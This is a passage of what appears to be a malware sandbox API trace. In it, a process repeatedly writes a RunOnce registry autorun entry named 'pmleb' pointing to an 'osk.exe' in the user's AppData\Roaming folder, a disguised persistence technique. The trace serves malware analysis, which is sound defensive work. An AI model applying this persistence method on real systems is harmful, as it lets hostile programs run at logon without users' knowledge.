0x0 [0094.621] RegCloseKey (hKey=0x280) returned 0x0 [0094.621] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.621] SetTimer (hWnd=0x20280, nIDEvent=0x225c, uElapse=0xa, lpTimerFunc=0x0) returned 0x225c [0094.622] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.636] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.636] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.636] KillTimer (hWnd=0x20280, uIDEvent=0x225c) returned 1 [0094.636] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.637] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.637] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.637] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.637] RegCloseKey (hKey=0x280) returned 0x0 [0094.637] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.638] SetTimer (hWnd=0x20280, nIDEvent=0x225d, uElapse=0xa, lpTimerFunc=0x0) returned 0x225d [0094.638] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.651] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.651] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.651] KillTimer (hWnd=0x20280, uIDEvent=0x225d) returned 1 [0094.651] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.652] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.652] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.652] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.652] RegCloseKey (hKey=0x280) returned 0x0 [0094.652] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.653] SetTimer (hWnd=0x20280, nIDEvent=0x225e, uElapse=0xa, lpTimerFunc=0x0) returned 0x225e [0094.653] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.681] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.681] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.681] KillTimer (hWnd=0x20280, uIDEvent=0x225e) returned 1 [0094.682] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.683] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.683] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.683] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.684] RegCloseKey (hKey=0x280) returned 0x0 [0094.684] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.684] SetTimer (hWnd=0x20280, nIDEvent=0x225f, uElapse=0xa, lpTimerFunc=0x0) returned 0x225f [0094.684] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.698] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.698] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.698] KillTimer (hWnd=0x20280, uIDEvent=0x225f) returned 1 [0094.698] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.699] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.699] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.699] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.699] RegCloseKey (hKey=0x280) returned 0x0 [0094.699] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.700] SetTimer (hWnd=0x20280, nIDEvent=0x2260, uElapse=0xa, lpTimerFunc=0x0) returned 0x2260 [0094.700] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.713] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.713] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.713] KillTimer (hWnd=0x20280, uIDEvent=0x2260) returned 1 [0094.714] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.714] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.714] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.714] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.715] RegCloseKey (hKey=0x280) returned 0x0 [0094.715] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.715] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.715] SetTimer (hWnd=0x20280, nIDEvent=0x2261, uElapse=0xa, lpTimerFunc=0x0) returned 0x2261 [0094.715] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.729] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.729] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.729] KillTimer (hWnd=0x20280, uIDEvent=0x2261) returned 1 [0094.729] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.730] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.730] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.730] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.730] RegCloseKey (hKey=0x280) returned 0x0 [0094.730] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.730] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.730] SetTimer (hWnd=0x20280, nIDEvent=0x2262, uElapse=0xa, lpTimerFunc=0x0) returned 0x2262 [0094.730] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.794] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.794] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.794] KillTimer (hWnd=0x20280, uIDEvent=0x2262) returned 1 [0094.794] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.794] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.795] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.795] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.795] RegCloseKey (hKey=0x280) returned 0x0 [0094.795] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.795] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.795] SetTimer (hWnd=0x20280, nIDEvent=0x2263, uElapse=0xa, lpTimerFunc=0x0) returned 0x2263 [0094.795] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.807] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.807] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.807] KillTimer (hWnd=0x20280, uIDEvent=0x2263) returned 1 [0094.807] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.808] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.808] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.808] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.808] RegCloseKey (hKey=0x280) returned 0x0 [0094.808] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.808] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.808] SetTimer (hWnd=0x20280, nIDEvent=0x2264, uElapse=0xa, lpTimerFunc=0x0) returned 0x2264 [0094.808] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.822] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.822] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.822] KillTimer (hWnd=0x20280, uIDEvent=0x2264) returned 1 [0094.823] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.823] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.823] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.823] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.824] RegCloseKey (hKey=0x280) returned 0x0 [0094.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.824] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.824] SetTimer (hWnd=0x20280, nIDEvent=0x2265, uElapse=0xa, lpTimerFunc=0x0) returned 0x2265 [0094.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.838] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.838] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.838] KillTimer (hWnd=0x20280, uIDEvent=0x2265) returned 1 [0094.838] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.839] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.839] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.839] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.839] RegCloseKey (hKey=0x280) returned 0x0 [0094.839] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.839] SetTimer (hWnd=0x20280, nIDEvent=0x2266, uElapse=0xa, lpTimerFunc=0x0) returned 0x2266 [0094.839] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.853] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.854] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.854] KillTimer (hWnd=0x20280, uIDEvent=0x2266) returned 1 [0094.854] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.854] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.855] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.855] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.855] RegCloseKey (hKey=0x280) returned 0x0 [0094.855] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.855] SetTimer (hWnd=0x20280, nIDEvent=0x2267, uElapse=0xa, lpTimerFunc=0x0) returned 0x2267 [0094.855] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.651] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.651] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.651] KillTimer (hWnd=0x20280, uIDEvent=0x2267) returned 1 [0095.651] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.653] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.653] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.653] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.654] RegCloseKey (hKey=0x280) returned 0x0 [0095.654] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.654] SetTimer (hWnd=0x20280, nIDEvent=0x2268, uElapse=0xa, lpTimerFunc=0x0) returned 0x2268 [0095.654] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.665] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.665] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.665] KillTimer (hWnd=0x20280, uIDEvent=0x2268) returned 1 [0095.665] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.666] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.666] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.666] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.666] RegCloseKey (hKey=0x280) returned 0x0 [0095.666] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.666] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.666] SetTimer (hWnd=0x20280, nIDEvent=0x2269, uElapse=0xa, lpTimerFunc=0x0) returned 0x2269 [0095.666] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.705] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.705] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.706] KillTimer (hWnd=0x20280, uIDEvent=0x2269) returned 1 [0095.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.706] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.706] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.707] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.707] RegCloseKey (hKey=0x280) returned 0x0 [0095.707] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.707] SetTimer (hWnd=0x20280, nIDEvent=0x226a, uElapse=0xa, lpTimerFunc=0x0) returned 0x226a [0095.707] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.716] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.716] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.717] KillTimer (hWnd=0x20280, uIDEvent=0x226a) returned 1 [0095.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.717] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.717] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.718] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.718] RegCloseKey (hKey=0x280) returned 0x0 [0095.718] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.718] SetTimer (hWnd=0x20280, nIDEvent=0x226b, uElapse=0xa, lpTimerFunc=0x0) returned 0x226b [0095.718] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.727] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.727] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.727] KillTimer (hWnd=0x20280, uIDEvent=0x226b) returned 1 [0095.728] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.728] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.728] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.728] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.729] RegCloseKey (hKey=0x280) returned 0x0 [0095.729] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.729] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.729] SetTimer (hWnd=0x20280, nIDEvent=0x226c, uElapse=0xa, lpTimerFunc=0x0) returned 0x226c [0095.729] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.743] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.743] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.743] KillTimer (hWnd=0x20280, uIDEvent=0x226c) returned 1 [0095.743] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.744] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.744] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.744] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.744] RegCloseKey (hKey=0x280) returned 0x0 [0095.744] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.745] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.745] SetTimer (hWnd=0x20280, nIDEvent=0x226d, uElapse=0xa, lpTimerFunc=0x0) returned 0x226d [0095.745] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.758] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.758] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.759] KillTimer (hWnd=0x20280, uIDEvent=0x226d) returned 1 [0095.759] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.759] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.759] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.760] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.760] RegCloseKey (hKey=0x280) returned 0x0 [0095.760] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.760] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.760] SetTimer (hWnd=0x20280, nIDEvent=0x226e, uElapse=0xa, lpTimerFunc=0x0) returned 0x226e [0095.760] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.774] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.774] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.774] KillTimer (hWnd=0x20280, uIDEvent=0x226e) returned 1 [0095.774] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.775] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 